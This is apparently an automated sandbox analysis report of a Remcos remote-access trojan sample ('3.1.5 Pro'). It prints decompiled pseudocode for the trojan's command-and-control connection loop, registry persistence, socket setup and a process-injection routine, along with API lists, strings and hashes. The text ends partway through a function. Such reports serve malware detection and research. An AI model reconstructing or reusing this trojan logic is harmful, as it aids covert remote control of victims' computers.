						_t602 = L00402F73(_t373,  &_v212, L00402EFD( &_v188, L00402F73(_t373,  &_v260, L00402EFD( &_v284, L00402F73(_t373,  &_v308, L00402F73(_t373,  &_v332, L00402F73(_t373,  &_v356, L00402F73(_t373,  &_v380, L00402F73(_t373,  &_v404, E0040530D(_t373,  &_v428, L00402F73(_t373,  &_v452, L00402EFD( &_v476, L00402F73(_t373,  &_v500, L00402EFD( &_v524, L00402F73(_t373,  &_v548, L0040759E(_t373,  &_v572, L00402F73(_t373,  &_v596, L00402EFD( &_v620, L00402F73(_t373,  &_v644, L00402EFD( &_v668, L00402F73(_t373,  &_v692, L00402EFD( &_v716, L00402F73(_t373,  &_v740, L00402EFD( &_v764, L00402F73(_t373,  &_v788, E0040530D(_t373,  &_v812, L00402F73(_t373,  &_v836, E0040530D(_t373,  &_v860, L00402F73(_t373,  &_v884, L00402EFD( &_v908, L00402F73(_t373,  &_v932, L00402F73(_t373,  &_v956, L00402F73(_t373,  &_v980, L00402EFD( &_v1004, L00402F73(_t373,  &_v1028, L00402EFD( &_v1052, L00402F97( &_v1076,  &_v80, 0x46c238), _t254), _t705, 0x46c238), _t253), _t705, 0x46c238), _t705, 0x46c5b4), _t705, 0x46c238), _t252), _t705, 0x46c238), 0x46c238, _t705,  &_v164), _t705, 0x46c238), 0x46c238, _t705, "3.1.5 Pro"), _t705, 0x46c238), _t250), _t705, 0x46c238), _t249), _t705, 0x46c238), _t248), _t705, 0x46c238), _t247), _t705, 0x46c238), 0x46c238, _t705,  *0x46a9d4 & 0x000000ff), _t705, 0x46c238), _t244), _t705, 0x46c238), _t242), _t705, 0x46c238), 0x46c238, _t705,  &_v140), _t705, 0x46c238), _t705, _t239), _t705, 0x46c238), _t705, "Remcos-8VTGWT"), _t705, 0x46c238), _t238), _t705, 0x46c238), _t237), _t705, 0x46c238);
						L00402F73(_t373, _t692, _t291, _t705,  &_v236);
						_push(0x4b);
						L00404A6E(_t373, 0x46c768, _t291, _t705);
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401ED0();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401ED0();
						L00404B88(0x46c768, _t291, 0x411d70, 1);
						_t345 =  *0x46bd48; // 0x0
						if(_t345 != 0 &&  *0x46bd4d != 0) {
							_t345 =  *_t345();
							 *0x46bd4d = 0;
						}
						if( *0x46c39a != 0) {
							_t345 = L00409520(_t373, 0x46c350);
						}
						L00405978(_t345);
						_t693 = _t692 - 0x18;
						E00402064(_t373, _t693, "Disconnected!");
						_t694 = _t693 - 0x18;
						E00402064(_t373, _t694, "[Info]");
						L004165D8(_t373, 0x46c238);
						_t680 = _t694 + 0x30;
						if( *0x46bea4 != 0) {
							CreateThread(0, 0, E0041601E, 0, 0, 0);
						}
						L00401FA7();
						L00401ED0();
					}
					_t667 = _v8;
					_t660 = 0x46c578;
				}
				_t667 = _t667 - 1;
				_v8 = _t667;
				_t373 = _t373 + 1;
				_t194 = E004021D5( &_v32);
				_t711 = _t373 - _t194;
				if(_t373 >= _t194) {
					_t196 = 2;
					_t373 = 0;
					_t200 = E00436079(_t197, L00401F75(L00401E29(_t660, _t602, _t711, _t196))) * 0x3e8;
					_t698 = _t200;
					Sleep(_t200); // executed
				}
				L00401E54( &_v20, _t602);
				goto L4;
			}































































































































                              0x00411325
                              0x00411328
                              0x00411333
                              0x0041133e
                              0x00411343
                              0x00411359
                              0x00411361
                              0x00411363
                              0x00411363
                              0x0041136a
                              0x0041136a
                              0x00411370
                              0x0041137a
                              0x00411383
                              0x00411388
                              0x0041138e
                              0x00411396
                              0x0041139b
                              0x0041139e
                              0x004113a2
                              0x004113a5
                              0x004113a9
                              0x004113ae
                              0x004113b5
                              0x004113ba
                              0x004113bc
                              0x004113c2
                              0x004113c9
                              0x004113da
                              0x004113e4
                              0x004113eb
                              0x004113fc
                              0x00411406
                              0x0041140d
                              0x0041141f
                              0x00411424
                              0x00411428
                              0x0041142d
                              0x00411430
                              0x00411430
                              0x00411432
                              0x00411432
                              0x0041143c
                              0x00411445
                              0x0041144a
                              0x00411450
                              0x00411458
                              0x0041145d
                              0x00411465
                              0x0041146a
                              0x00411471
                              0x0041147d
                              0x00411481
                              0x00411486
                              0x0041148d
                              0x004114a0
                              0x004114a7
                              0x004114aa
                              0x004114b3
                              0x004114ac
                              0x004114ac
                              0x004114ac
                              0x004114b8
                              0x004114bd
                              0x004114cb
                              0x00411505
                              0x00411509
                              0x0041150e
                              0x00411518
                              0x0041151d
                              0x00411522
                              0x00411528
                              0x00411530
                              0x00411538
                              0x0041153d
                              0x0041153d
                              0x00411542
                              0x00411548
                              0x00411555
                              0x0041155b
                              0x00411561
                              0x00411563
                              0x00411578
                              0x00411592
                              0x00411599
                              0x0041159f
                              0x004115a2
                              0x004115af
                              0x004115b0
                              0x004115b1
                              0x004115b2
                              0x004115ba
                              0x004115bf
                              0x004115c1
                              0x004115c7
                              0x004115d5
                              0x00411615
                              0x00411619
                              0x0041161e
                              0x00411628
                              0x0041162d
                              0x00411638
                              0x00411643
                              0x0041164e
                              0x00411659
                              0x0041165e
                              0x0041166f
                              0x00411671
                              0x00411674
                              0x00411675
                              0x00411676
                              0x00411677
                              0x00411678
                              0x0041167d
                              0x0041168b
                              0x0041169b
                              0x004116af
                              0x004116c6
                              0x004116d2
                              0x004116da
                              0x004116fd
                              0x00411702
                              0x00411707
                              0x00411713
                              0x00411713
                              0x00411718
                              0x0041171d
                              0x0041171f
                              0x00411721
                              0x00411725
                              0x00411725
                              0x00411730
                              0x00411735
                              0x00411751
                              0x00411765
                              0x0041177c
                              0x00411799
                              0x004117ad
                              0x004117d0
                              0x004117e2
                              0x004117f2
                              0x00411802
                              0x00411822
                              0x00411835
                              0x00411847
                              0x00411a55
                              0x00411a59
                              0x00411a64
                              0x00411a68
                              0x00411a73
                              0x00411a7e
                              0x00411a89
                              0x00411a94
                              0x00411a9f
                              0x00411aaa
                              0x00411ab5
                              0x00411ac0
                              0x00411acb
                              0x00411ad6
                              0x00411ae1
                              0x00411aec
                              0x00411af7
                              0x00411b02
                              0x00411b0d
                              0x00411b18
                              0x00411b23
                              0x00411b2e
                              0x00411b39
                              0x00411b44
                              0x00411b4f
                              0x00411b5a
                              0x00411b65
                              0x00411b70
                              0x00411b7b
                              0x00411b86
                              0x00411b91
                              0x00411b9c
                              0x00411ba7
                              0x00411bb2
                              0x00411bbd
                              0x00411bc8
                              0x00411bd3
                              0x00411bde
                              0x00411be9
                              0x00411bf4
                              0x00411bff
                              0x00411c0a
                              0x00411c15
                              0x00411c20
                              0x00411c2b
                              0x00411c36
                              0x00411c41
                              0x00411c4c
                              0x00411c57
                              0x00411c62
                              0x00411c6d
                              0x00411c78
                              0x00411c83
                              0x00411c8b
                              0x00411c99
                              0x00411c9e
                              0x00411ca5
                              0x00411cb0
                              0x00411cb2
                              0x00411cb2
                              0x00411cc0
                              0x00411cc7
                              0x00411cc7
                              0x00411ccc
                              0x00411cd1
                              0x00411cdb
                              0x00411ce0
                              0x00411cea
                              0x00411cef
                              0x00411cf4
                              0x00411cfe
                              0x00411d0c
                              0x00411d0c
                              0x00411d15
                              0x00411d1d
                              0x00411d1d
                              0x00411d22
                              0x00411d25
                              0x00411d25
                              0x00411d2a
                              0x00411d2e
                              0x00411d31
                              0x00411d32
                              0x00411d37
                              0x00411d39
                              0x00411d3d
                              0x00411d41
                              0x00411d55
                              0x00411d55
                              0x00411d5d
                              0x00411d5d
                              0x00411d66
                              0x00000000

                              APIs
                              • Sleep.KERNEL32(00000000,00000029,73B743E0,0046C578,00000000), ref: 0041136A
                                • Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2
                              • gethostbyname.WS2_32(00000000), ref: 0041155B
                              • htons.WS2_32(00000000), ref: 00411599
                              • Sleep.KERNELBASE(00000000,00000002), ref: 00411D5D
                                • Part of subcall function 00410420: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 0041043C
                                • Part of subcall function 00410420: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00410455
                                • Part of subcall function 00410420: RegCloseKey.ADVAPI32(00000000), ref: 00410460
                              • GetTickCount.KERNEL32 ref: 0041178B
                                • Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2
                              • CreateThread.KERNEL32(00000000,00000000,0041601E,00000000,00000000,00000000), ref: 00411D0C
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Sleep$CloseCountCreateLocalOpenQueryThreadTickTimeValuegethostbynamehtonssend
                              • String ID: (TLS)$%I64u$3.1.5 Pro$C:\Windows\SysWOW64\mobsync.exe$Connected to $Connecting to $Disconnected!$Remcos-8VTGWT$[Info]$name
                              • API String ID: 2130001850-3107917961
                              • Opcode ID: 453a725cf9e8c8a0c3275ea6f381c23dcfb53096a435ff95b8df44e628af73f6
                              • Instruction ID: 83ef738f165b9044fa0b5899371646b5f38477a05a31d0d6adf18a21a94f173f
                              • Opcode Fuzzy Hash: 453a725cf9e8c8a0c3275ea6f381c23dcfb53096a435ff95b8df44e628af73f6
                              • Instruction Fuzzy Hash: CF427E71A002155ACB18F761DC56EEEB365AB50308F5041BFB40AB71E2EF7C5F86CA89
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004179B3, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 134COMMON
                              Download Yara Rule
                              C-Code - Quality: 84%
                              			E004179B3(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v524;
				char _v544;
				char _v560;
				char _v572;
				void* _v576;
				char _v580;
				char _v584;
				char _v600;
				char _v608;
				char _v616;
				char _v620;
				void* _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v644;
				void* _v648;
				char _v652;
				void* _v672;
				void* __ebx;
				signed int _t36;
				void* _t39;
				void* _t40;
				void* _t77;

				_t73 = __edx;
				_t77 = __ecx;
				_t54 = __edx;
				L00401F4D(__edx,  &_v644);
				_t36 = __edx + 0xffffffd0;
				_t85 = _t36 - 7;
				if(_t36 <= 7) {
					switch( *((intOrPtr*)(_t36 * 4 +  &M00417B8F))) {
						case 0:
							_push(L"Temp");
							goto L14;
						case 1:
							__ecx =  &_v620;
							__eax = L0041669D(__ebx,  &_v620);
							__ecx =  &_v644;
							__eax = L00401EDA( &_v644, __edx, __esi, __eax);
							goto L4;
						case 2:
							_push(L"SystemDrive");
							goto L14;
						case 3:
							_push(L"WinDir");
							goto L14;
						case 4:
							__eax = L00416F6C(__ecx);
							__eflags = __al;
							if(__eflags != 0) {
								__ecx =  &_v620;
								E0040425F(__ebx, __ecx, L"\\SysWOW64") = E0043918F(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v580;
								__eax = E00403010( &_v580, __edx, __eax);
								__ecx =  &_v652;
								__eax = L00401EDA( &_v652, __edx, __esi, __eax);
								__ecx =  &_v584;
								__eax = L00401ED0();
								__ecx =  &_v608;
								__eax = L00401ED0();
								L4:
								__ecx =  &_v620;
								goto L5;
							} else {
								__ecx =  &_v572;
								E0040425F(__ebx, __ecx, L"\\system32") = E0043918F(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v628;
								__eax = E00403010( &_v628, __edx, __eax);
								__ecx =  &_v652;
								__eax = L00401EDA( &_v652, __edx, __esi, __eax);
								__ecx =  &_v632;
								__eax = L00401ED0();
								__ecx =  &_v608;
								__eax = L00401ED0();
								__ecx =  &_v584;
								L5:
								__eax = L00401ED0();
								goto L15;
							}
							L16:
						case 5:
							_push(L"ProgramFiles");
							goto L14;
						case 6:
							_push(L"AppData");
							goto L14;
						case 7:
							_push(L"UserProfile");
							L14:
							L00409DCB(_t54,  &_v644, E0043918F(_t54, _t57, _t85));
							goto L15;
					}
				}
				L15:
				__imp__GetLongPathNameW(L00401ECB( &_v644),  &_v524, 0x208); // executed
				_t39 = E0040425F(_t54,  &_v560, _a4);
				_t40 = E0040425F(_t54,  &_v636, "\\");
				E00403010(_t77, E00403010( &_v600, L00417D4C(_t54,  &_v616, _t73, _t85,  &_v544, _t38), _t40), _t39);
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				return _t77;
				goto L16;
			}



























                              0x004179b3
                              0x004179c2
                              0x004179c4
                              0x004179ca
                              0x004179d2
                              0x004179d5
                              0x004179d8
                              0x004179de
                              0x00000000
                              0x004179e5
                              0x00000000
                              0x00000000
                              0x004179ef
                              0x004179f3
                              0x004179f9
                              0x004179fd
                              0x00000000
                              0x00000000
                              0x00417a10
                              0x00000000
                              0x00000000
                              0x00417a1a
                              0x00000000
                              0x00000000
                              0x00417a24
                              0x00417a29
                              0x00417a2b
                              0x00417a84
                              0x00417a93
                              0x00417a9a
                              0x00417aa3
                              0x00417aa5
                              0x00417aa9
                              0x00417ab0
                              0x00417ab4
                              0x00417ab9
                              0x00417abd
                              0x00417ac2
                              0x00417ac6
                              0x00417a02
                              0x00417a02
                              0x00000000
                              0x00417a2d
                              0x00417a32
                              0x00417a41
                              0x00417a48
                              0x00417a51
                              0x00417a53
                              0x00417a57
                              0x00417a5e
                              0x00417a62
                              0x00417a67
                              0x00417a6b
                              0x00417a70
                              0x00417a74
                              0x00417a79
                              0x00417a06
                              0x00417a06
                              0x00000000
                              0x00417a06
                              0x00000000
                              0x00000000
                              0x00417ad0
                              0x00000000
                              0x00000000
                              0x00417ad7
                              0x00000000
                              0x00000000
                              0x00417ade
                              0x00417ae3
                              0x00417aee
                              0x00000000
                              0x00000000
                              0x004179de
                              0x00417af3
                              0x00417b0a
                              0x00417b19
                              0x00417b28
                              0x00417b50
                              0x00417b5a
                              0x00417b63
                              0x00417b6c
                              0x00417b75
                              0x00417b7e
                              0x00417b8b
                              0x00000000

                              APIs
                              • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 00417B0A
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: LongNamePath
                              • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                              • API String ID: 82841172-1609423294
                              • Opcode ID: 35c28d9923312f15828796b161f12df378b3fca9c55578f31d1e83ebc7bc6e77
                              • Instruction ID: 6472f6f80a3df67a90006e08033efa2a9a0bfe3ce3822e9bff2fa4fccbff765a
                              • Opcode Fuzzy Hash: 35c28d9923312f15828796b161f12df378b3fca9c55578f31d1e83ebc7bc6e77
                              • Instruction Fuzzy Hash: 224126711082005AC314FB62DC52DEFB3A9AE90798F10093FF556620E2EE789F49C69B
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00410497, Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 77%
                              			E00410497(void* __ecx, char* __edx, char* _a4, char _a8, int _a32) {
				void* _v8;
				long _t12;
				int _t15;
				long _t17;
				signed int _t19;
				signed int _t20;

				_push(__ecx);
				_push(_t19);
				_t12 = RegCreateKeyA(0x80000001, __edx,  &_v8); // executed
				if(_t12 != 0) {
					_t20 = 0;
				} else {
					_t15 = L00402469();
					_t17 = RegSetValueExA(_v8, _a4, 0, _a32, L00401F75( &_a8), _t15); // executed
					RegCloseKey(_v8);
					_t20 = _t19 & 0xffffff00 | _t17 == 0x00000000;
				}
				L00401FA7();
				return _t20;
			}









                              0x0041049a
                              0x0041049b
                              0x004104a6
                              0x004104ae
                              0x004104e7
                              0x004104b0
                              0x004104b4
                              0x004104ce
                              0x004104d9
                              0x004104e2
                              0x004104e2
                              0x004104ec
                              0x004104f7

                              APIs
                              • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004104A6
                              • RegSetValueExA.KERNELBASE(?,0046062C,00000000,?,00000000,00000000,0046C518,?,?,0040D501,0046062C,3.1.5 Pro), ref: 004104CE
                              • RegCloseKey.ADVAPI32(?,?,?,0040D501,0046062C,3.1.5 Pro), ref: 004104D9
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CloseCreateValue
                              • String ID:
                              • API String ID: 1818849710-0
                              • Opcode ID: a8bc24b0db01374bc919d6c9d6992345ff6f38f3f877acf754395c2b83bdb208
                              • Instruction ID: 9045ae6a7ebcd238780a3c55024b685f51bb899022283947814aae02ff94998e
                              • Opcode Fuzzy Hash: a8bc24b0db01374bc919d6c9d6992345ff6f38f3f877acf754395c2b83bdb208
                              • Instruction Fuzzy Hash: ECF09672500208FFCB009FA1DD45EEE376CEF04751F108166BD05A61A1E7759F54DA94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00410275, Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00410275(char* __edx, char* _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				int _t12;
				long _t14;
				long _t18;

				_t12 = 4;
				_v12 = _t12;
				_v16 = _t12;
				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				}
				_t18 = RegQueryValueExA(_v8, _a4, 0,  &_v16, _a8,  &_v12);
				return RegCloseKey(_v8) & 0xffffff00 | _t18 == 0x00000000;
			}









                              0x0041027d
                              0x0041027e
                              0x00410281
                              0x00410295
                              0x0041029d
                              0x00000000
                              0x004102cc
                              0x004102b3
                              0x00000000

                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00410295
                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,0046C518), ref: 004102B3
                              • RegCloseKey.ADVAPI32(?), ref: 004102BE
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID:
                              • API String ID: 3677997916-0
                              • Opcode ID: 6020211f2f41a99924b2582c1e80447f15e98d83b67fb738d9560e140564669e
                              • Instruction ID: da35563d8025d65dfadb3f1a4e24c633330656b2ed15e4664ff05724ceb20d8f
                              • Opcode Fuzzy Hash: 6020211f2f41a99924b2582c1e80447f15e98d83b67fb738d9560e140564669e
                              • Instruction Fuzzy Hash: 90F01D7690030CBFDF109FA09D05BEE7BBCEB04B51F1040A5FE04E6195D2719B549B94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00404955, Relevance: 1.5, APIs: 1, Instructions: 30networkCOMMON
                              Download Yara Rule
                              C-Code - Quality: 37%
                              			E00404955(char* __ecx) {
				intOrPtr _t8;
				char _t13;
				char* _t14;

				_t14 = __ecx;
				if( *0x46baab != 0) {
					L3:
					__imp__#23(0, 1, 6); // executed
					 *((intOrPtr*)(_t14 + 4)) = _t8;
					if(_t8 == 0xffffffff) {
						L2:
						return 0;
					}
					_t13 =  *0x46bae0; // 0x0
					 *((char*)(_t14 + 0x50)) = 0;
					 *((intOrPtr*)(_t14 + 0x54)) = 0;
					 *((intOrPtr*)(_t14 + 0x4c)) = 0x3e8;
					 *((char*)(_t14 + 0x65)) = 0;
					 *((char*)(_t14 + 1)) = _t13;
					 *((intOrPtr*)(_t14 + 0x44)) = 0;
					 *_t14 = 1;
					return 1;
				}
				_t8 = E004049A8(); // executed
				if(_t8 != 0) {
					goto L3;
				}
				goto L2;
			}






                              0x0040495e
                              0x00404960
                              0x0040496f
                              0x00404976
                              0x0040497c
                              0x00404982
                              0x0040496b
                              0x00000000
                              0x0040496b
                              0x00404984
                              0x0040498c
                              0x0040498f
                              0x00404992
                              0x00404999
                              0x0040499c
                              0x0040499f
                              0x004049a2
                              0x00000000
                              0x004049a2
                              0x00404962
                              0x00404969
                              0x00000000
                              0x00000000
                              0x00000000

                              APIs
                              • socket.WS2_32(00000000,00000001,00000006), ref: 00404976
                                • Part of subcall function 004049A8: WSAStartup.WS2_32(00000202,00000000), ref: 004049BD
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Startupsocket
                              • String ID:
                              • API String ID: 3996037109-0
                              • Opcode ID: 57deaf7df3839363482a97d4bb077c46ff9157abd3d4fca2155b12ae97433c1f
                              • Instruction ID: 62ee2057d8b28695902b4436e4315656a2426cea2330156b944394806be68f62
                              • Opcode Fuzzy Hash: 57deaf7df3839363482a97d4bb077c46ff9157abd3d4fca2155b12ae97433c1f
                              • Instruction Fuzzy Hash: 5FF0BEF04057905ED7318F385884397BFD49B52318F04497EE2D2A37C2D2B96405876A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004049A8, Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                              Download Yara Rule
                              APIs
                              • WSAStartup.WS2_32(00000202,00000000), ref: 004049BD
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Startup
                              • String ID:
                              • API String ID: 724789610-0
                              • Opcode ID: ac0fcd44a18d9d81a3d82cc89e4d091a56d1cbdc41663de66bf519bb87ef27f6
                              • Instruction ID: c6028f311036b87a725e3855d38eddd9b01408ba72ab7eba5a9d2c49baa38117
                              • Opcode Fuzzy Hash: ac0fcd44a18d9d81a3d82cc89e4d091a56d1cbdc41663de66bf519bb87ef27f6
                              • Instruction Fuzzy Hash: 01D0123255860C4ED611AAB4AC0F8A5775CC317612F4003BAACB5C25D3F650571CC2FB
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Function 0040D1AD, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 186processsynchronizationCOMMON
                              Download Yara Rule
                              C-Code - Quality: 97%
                              			E0040D1AD(void* __eflags, char _a4) {
				void* _v8;
				char _v32;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v96;
				char _v120;
				char _v648;
				intOrPtr _v676;
				void* _v684;
				short _v1204;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t76;
				struct _SECURITY_ATTRIBUTES* _t106;
				char* _t111;
				void* _t158;
				void* _t161;

				_t106 = 0;
				GetModuleFileNameW(0,  &_v1204, 0x104);
				_t149 = "1";
				if(L00407746("1") != 0) {
					L14:
					L00401EDA( &_a4, _t149, _t159, L00416773(_t106,  &_v120, _t149));
					_t111 =  &_v120;
					L00401ED0();
					if(L00416F6C(_t111) != 0) {
						_push(_t111);
						if(L0040D84F( &_a4, L"Program Files\\") != 0xffffffff) {
							L0040D870(_t106,  &_a4, _t157, _t73, 0xe, L"Program Files (x86)\\");
						}
					}
					if(L0040EE85( &_v1204,  &_a4) != 0) {
						L22:
						L00401ED0();
						return _t106;
					} else {
						L18:
						_t158 = CreateMutexA(_t106, 1, "Remcos_Mutex_Inj");
						E004020B5(_t106,  &_v96);
						E00417334(L00401ECB(0x46c500),  &_v96);
						L00401F75( &_v96);
						if(L00413CCA(L00401ECB( &_a4)) == 0) {
							CloseHandle(_t158);
						} else {
							_t106 = 1;
							L004105A0(0x46c518, L00401F75(0x46c518), "Inj", 1);
						}
						L00401FA7();
						goto L22;
					}
				}
				L00401F4D(0,  &_v32);
				_t76 = CreateToolhelp32Snapshot(2, 0);
				_v8 = _t76;
				_v684 = 0x22c;
				Process32FirstW(_t76,  &_v684);
				while(Process32NextW(_v8,  &_v684) != 0) {
					E0040425F(_t106,  &_v56,  &_v648);
					_t157 = E004022EA( &_v56,  &_v60);
					_t159 = E004022AD( &_v56,  &_v64);
					E00408228( &_v72,  *((intOrPtr*)(E004022EA( &_v56,  &_v68))),  *_t84,  *_t82);
					_t161 = _t161 + 0xc;
					if(L00409EAE( &_a4) != 0) {
						L00401EDA( &_v32, _v676, _t159, L00416FD0( &_v120, _v676));
						L00401ED0();
						if(L00407746( &_v1204) == 0) {
							_t149 = 0x45f714;
							if(L00407746(0x45f714) != 0 || L00416F9A(_v676) != 0) {
								L00401ED0();
								L13:
								L00401ED0();
								goto L14;
							} else {
								L00409E58( &_v32);
								L00401ED0();
								break;
							}
						}
						L00401ED0();
						L00401ED0();
						goto L22;
					}
					L00401ED0();
				}
				CloseHandle(_v8);
				_t149 = 0x45f714;
				if(L00407746(0x45f714) != 0) {
					goto L13;
				}
				L00401ED0();
				goto L18;
			}
























                              0x0040d1c5
                              0x0040d1c8
                              0x0040d1ce
                              0x0040d1dd
                              0x0040d33e
                              0x0040d34a
                              0x0040d34f
                              0x0040d352
                              0x0040d35e
                              0x0040d360
                              0x0040d371
                              0x0040d37e
                              0x0040d37e
                              0x0040d371
                              0x0040d393
                              0x0040d40d
                              0x0040d410
                              0x0040d41d
                              0x0040d395
                              0x0040d395
                              0x0040d3a6
                              0x0040d3a8
                              0x0040d3bc
                              0x0040d3c4
                              0x0040d3de
                              0x0040d3ff
                              0x0040d3e0
                              0x0040d3e7
                              0x0040d3f5
                              0x0040d3fb
                              0x0040d408
                              0x00000000
                              0x0040d408
                              0x0040d393
                              0x0040d1e6
                              0x0040d1ee
                              0x0040d1fa
                              0x0040d1ff
                              0x0040d209
                              0x0040d270
                              0x0040d21b
                              0x0040d22c
                              0x0040d23a
                              0x0040d251
                              0x0040d256
                              0x0040d266
                              0x0040d2c1
                              0x0040d2c9
                              0x0040d2de
                              0x0040d2f5
                              0x0040d304
                              0x0040d331
                              0x0040d339
                              0x0040d339
                              0x00000000
                              0x0040d315
                              0x0040d31c
                              0x0040d324
                              0x00000000
                              0x0040d324
                              0x0040d304
                              0x0040d2e3
                              0x0040d2eb
                              0x00000000
                              0x0040d2eb
                              0x0040d26b
                              0x0040d26b
                              0x0040d287
                              0x0040d28d
                              0x0040d29f
                              0x00000000
                              0x00000000
                              0x0040d2a5
                              0x00000000

                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,0046C578,00000000,00000001), ref: 0040D1C8
                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0040D1EE
                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040D209
                              • Process32NextW.KERNEL32(0040CC11,0000022C), ref: 0040D27A
                              • CloseHandle.KERNEL32(0040CC11,?,00000000,?,?,?), ref: 0040D287
                              • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj,00000000), ref: 0040D39D
                              • CloseHandle.KERNEL32(00000000), ref: 0040D3FF
                                • Part of subcall function 00416FD0: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00416FE5
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                              • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
                              • API String ID: 193334293-694575909
                              • Opcode ID: 28a638553a22d9f5be275812809799c4db8dcf5cce7f1ff8c7c3ee5921d254a0
                              • Instruction ID: 478cdb67a5d67a03f70ae787e2c2ba94b2730d13673da361e8ab10cc645f79f9
                              • Opcode Fuzzy Hash: 28a638553a22d9f5be275812809799c4db8dcf5cce7f1ff8c7c3ee5921d254a0
                              • Instruction Fuzzy Hash: 51613F30900209AACF14EFA1D9969EE7735AF10349F50417EB816771E2EF386E4ECA59
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004170AC, Relevance: 13.6, APIs: 9, Instructions: 147fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004170AC(WCHAR* __ecx) {
				char _v5;
				WCHAR* _v12;
				short _v532;
				short _v1052;
				struct _WIN32_FIND_DATAW _v1644;
				signed int _t52;
				intOrPtr _t53;
				char _t54;
				short _t55;
				signed int _t56;
				intOrPtr _t57;
				char _t58;
				signed int _t63;
				char _t68;
				void _t72;
				void _t73;
				signed int _t78;
				signed int _t84;
				void* _t86;
				intOrPtr* _t89;
				signed short* _t90;
